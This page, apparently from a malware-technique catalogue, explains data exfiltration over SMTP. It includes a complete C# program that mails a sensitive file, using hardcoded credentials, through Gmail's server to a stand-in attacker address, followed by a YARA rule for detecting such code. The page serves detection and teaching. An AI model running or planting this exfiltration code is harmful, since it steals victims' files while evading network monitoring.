Exfiltration via SMTP

Created the Thursday 09 January 2025. Updated 5 days, 13 hours ago.

Exfiltration via SMTP is a technique where attackers leverage the Simple Mail Transfer Protocol (SMTP) to exfiltrate data. This method involves sending stolen data, such as sensitive files or system information, via email to an attacker-controlled email account. By using email traffic, attackers can often bypass traditional network monitoring solutions since SMTP traffic is usually deemed legitimate.

To execute such exfiltration, attackers can embed hardcoded credentials within malware to connect to an email server. The malware sends the exfiltrated data as email attachments, taking advantage of popular SMTP providers like Gmail or Outlook to facilitate the transfer. The use of SSL/TLS encryption for securing emails further complicates detection efforts.

Although this specific example is focused on data exfiltration, SMTP can also be adapted to function as a communication channel for C2 by encoding commands and responses within email messages.

Technique Identifier

U0912

Technique Tags

Email Exfiltration SMTPabuse

Code Snippets

Description

This code demonstrates a data exfiltration technique where a file (report.pdf) is sent as an email attachment to an attacker-controlled email address using SMTP, leveraging hardcoded credentials and SSL/TLS encryption for transmission.

using System;
using System.IO;
using System.Net;
using System.Net.Mail;

class C2ViaSMTP
{
    static void Main()
    {
        // Target file exfiltrate
        string targetFilePath = @"C:\SensitiveData\report.pdf";
        string emailRecipient = "attacker@example.com";
        string attackerEmail = "malwarebot@gmail.com";
        string attackerPassword = "maliciouspassword123";

        try
        {
            // Send data as a email message
            MailMessage message = new MailMessage();
            message.From = new MailAddress(attackerEmail);
            message.To.Add(emailRecipient);
            message.Subject = "Exfiltrated Data";
            message.Body = "Attached file contains sensitive exfiltrated data.";
            
            // Add target file as attachment
            Attachment attachment = new Attachment(targetFilePath);
            message.Attachments.Add(attachment);

            // Configure SMTP client
            SmtpClient smtpClient = new SmtpClient("smtp.gmail.com")
            {
                Port = 587,
                Credentials = new NetworkCredential(attackerEmail, attackerPassword),
                EnableSsl = true
            };

            // Send email
            smtpClient.Send(message);
            Console.WriteLine("Data exfiltration email sent successfully.");
        }
        catch (Exception ex)
        {
            Console.WriteLine("Error: " + ex.Message);
        }
    }
}

About Author Open Snippet

Author: Tasdir Ahmmed (Tasdir) / Target Platform: Windows

Detection Rules

rule Detect_SMTP_Exfiltration
{
    meta:
        description = "Detects potential SMTP exfiltration scripts"
        author = "Unprotect"
        date = "2025-01-09"
        reference = "Example based on SMTP exfiltration code"

    strings:
        $smtp_client = "SmtpClient" nocase
        $mail_message = "MailMessage" nocase
        $email_subject = "Exfiltrated Data" nocase
        $attachment = "Attachment" nocase
        $smtp_server = "smtp.gmail.com" nocase
        $email_address = /[a-z0-9._%+-]+@[a-z0-9.-]+\.[a-z]{2,}/ nocase
        $hardcoded_password = /"[a-z0-9!@#$%^&*()_+={}\[\]:;'<>,.?\/-]{6,}"/ nocase

    condition:
        $smtp_client and $mail_message and $email_subject and $attachment and $smtp_server and $email_address and $hardcoded_password
}

Contributor

Tasdir Ahmmed (Tasdir)